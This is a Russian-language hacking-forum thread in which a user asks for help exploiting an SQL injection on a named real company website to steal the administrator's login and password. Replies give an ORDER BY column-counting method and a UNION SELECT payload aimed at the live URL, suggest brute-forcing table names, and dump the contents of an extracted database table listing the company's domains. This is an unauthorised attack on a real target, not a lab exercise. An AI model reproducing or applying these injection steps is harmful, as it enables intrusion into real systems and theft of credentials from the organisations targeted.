• XSS.stack #1 – первый литературный журнал от юзеров форума

sql heeeelp

Отслеживать
DiegO

DiegO

RAM
Пользователь
Регистрация
28.07.2010
Сообщения
140
Реакции
2
Помаите пожалуйсто раскрутить sql-injection вот тут http://www.ocm.ru/ru/press/index.php?id15=744 , я смог узнать только:

Version: 4.1.22
user: ummc@localhost
database(): ummc

Нужно получить логин и пасс админа...

Перечитал кучу статей всё равно не магу :D
У самого не хватает наывка, поэтому прошу помощи у вас. Пожалуйсто - если можно то опишите всё подробно!!! А то я так не когда не научусь... :(
 
http://www.ocm.ru/ru/press/index.php?id15=...14,15,15,16+--+

Способ подбора и анализа: ~+order+by+18

http://www.ocm.ru/ru/press/index.php?id15=...order+by+18+--+ Ошибки нет)
http://www.ocm.ru/ru/press/index.php?id15=...order+by+19+--+ Ошибка....

Это говорит о том, что используется 18 колонок..... значит построение запроса выглядит так: ~+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,15,16+--+

Читаемые символы: 8,9,11

база: ummc
Версия скуля: 4.1.22
Пользователь: localhost

PS: Символ "~" означает http://syte.com я так обозначаю....
Логин и пас админа вытащить проблемно из за неизвестности колонок и таблиц в базе... По скольку MySql версии 4.x.x, название таблиц и столбцов ток брутить) Удачи в этом забавном процессе)
 
Да там нет админки, и таблицы всего 2 - links и server, первая судя по всему пуста вовсе, вторая имеет только одну колонку url, используеться паходу для аплоада файлов, её содержание
Код: 
*.b
*.sh
*.md5
*.rpm
*.arj
*.tar
*.zip
*.tgz
*.gz
*.z
*.bz2
*.lha
*.lzh
*.rar
*.zoo
*.ha
*.tar.Z
*.gif
*.jpg
*.jpeg
*.bmp
*.tiff
*.tif
*.xpm
*.xbm
*.pcx
*.vdo
*.mpeg
*.mpe
*.mpg
*.avi
*.movie
*.mov
*.wmv
*.mid
*.mp3
*.rm
*.ram
*.wav
*.aiff
*.ra
*.vrml
*.wrl
*.png
*.ico
*.psd
*.dat
*.exe
*.com
*.cab
*.dll
*.bin
*.class
*.ex_
*.tex
*.texi
*.texinfo
*.cdf
*.ps
*.ai
*.eps
*.ppt
*.hqx
*.cpt
*.bms
*.oda
*.tcl
*.o
*.a
*.la
*.so
*.pat
*.pm
*.m4
*.am
*.css
*.map
*.aif
*.sit
*.sea
*.m3u
*.qt
*D=A
*D=D
*M=A
*M=D
*N=A
*N=D
*S=A
*S=D
\.r[0-9][0-9]$
\.a[0-9][0-9]$
\.so\.[0-9]$
*?LINK=*
http://ugmk.biz/
http://ugmk.com/
http://ugmk.org/
http://www.ugmk.biz/
http://www.ugmk.com/
http://www.ugmk.org/
http://ummc.rbc.ru/
http://test.ummc.rbc.ru/
http://bk.ummc.rbc.ru/
http://test.bk.ummc.rbc.ru/
www.basket.ugmk.com
basket.ugmk.com
:///
http://basket.ugmk.com/

хаведж рулед :P
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх